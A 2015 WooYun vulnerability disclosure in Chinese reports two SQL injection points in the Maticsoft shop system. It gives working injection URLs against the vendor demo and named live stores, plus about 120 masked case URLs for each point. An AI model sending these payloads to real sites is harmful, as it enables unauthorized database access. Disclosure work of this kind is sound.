当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146836

漏洞标题:动软商城系统2枚SQL注入/影响大量商城站点(100+案例)

相关厂商:动软卓越(北京)科技有限公司

漏洞作者: 路人甲

提交时间:2015-10-15 11:25

修复时间:2015-11-29 11:26

公开时间:2015-11-29 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

挺有名的商城系统

详细说明:

其实写那么多案例就想上个首页,嘻嘻~
想必都知道这个商城系统挺有名也挺多人用的。案例我就不可能一一列出来了~
注入点:

/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1


看看官方demo吧:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27
明明显显的mssql注入,也有极小部分是mysql数据库的注入

1.jpg


爆数据库版本:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version>0--

3.jpg


看看user吧,想怎么注就怎么注入:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user>0--

4.jpg


捕获一个mysql注入的:
http://www.syltmall.com/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1'

2.jpg


121个案例献上证明:

mask 区域
1.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--  官方demo_
2.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
3.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
4.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
5.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
6.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
7.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
8.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
9.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
10.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
11.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
12.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
13.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
14.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
15.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
16.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
22.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
23.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
24.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
**********
25.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
26.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
27.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
28.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
29.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
30.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
31.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
32.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
33.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
34.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
35.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
36.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
37.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
38.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
39.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
40.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
41.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
42.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
43.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
44.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
45.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
46.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
47.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
48.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
49.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
50.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
51.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
52.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
53.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
54.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
55.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
56.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
57.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
58.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
59.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
60.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
61.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
62.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
63.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
64.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
65.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
66.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
67.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
68.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
69.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
70.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
71.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
72.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
73.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
74.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
75.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
76.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
77.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
78.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
79.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
80.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
81.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
82.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
83.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
84.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
85.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
86.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
87.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
88.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
89.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
90.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
91.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
92.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
93.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
94.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
95.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
96.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
97.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
98.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
99.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
100.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
101.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
102.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
103.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
104.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
105.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
106.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
107.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
108.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
109.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
110.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
111.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
112.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
113.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
114.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
115.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
116.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
117.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
118.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
119.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
120.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
121.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
122.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--


注入点二:

/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1


1.jpg


测试案例:

mask 区域
1.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
2.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
3.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
4.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
5.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
6.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
7.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
8.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
9.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
10.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
11.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
12.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
13.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
14.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
15.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
16.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
22.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
23.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
24.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
25.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
26.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
27.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
28.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
29.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
30.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
31.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
32.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
33.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
34.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
35.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
36.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
37.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
38.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
39.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
40.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
41.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
42.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
43.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
44.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
45.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
46.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
47.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
48.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
49.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
50.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
51.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
52.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
53.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
54.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
55.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
56.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
57.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
58.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
59.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
60.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
61.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
62.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
63.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
64.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
65.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
66.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
67.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
68.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
69.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
70.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
71.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
72.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
73.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
74.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
75.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
76.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
77.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
78.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
79.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
80.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
81.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
82.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
83.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
84.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
85.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
86.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
87.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
88.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
89.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
90.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
91.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
92.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
93.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
94.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
95.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
96.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
97.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
98.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
99.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
100.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
101.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
102.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
103.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
104.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
105.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
106.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
107.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
108.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
109.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
110.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
111.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
112.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
113.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
114.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
115.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
116.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
117.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
118.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
119.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
120.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
121.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--


漏洞证明:

http://kbfsshop.com/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1%20and%20@@version>0--


2.jpg

漏洞证明:

如上证明~

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)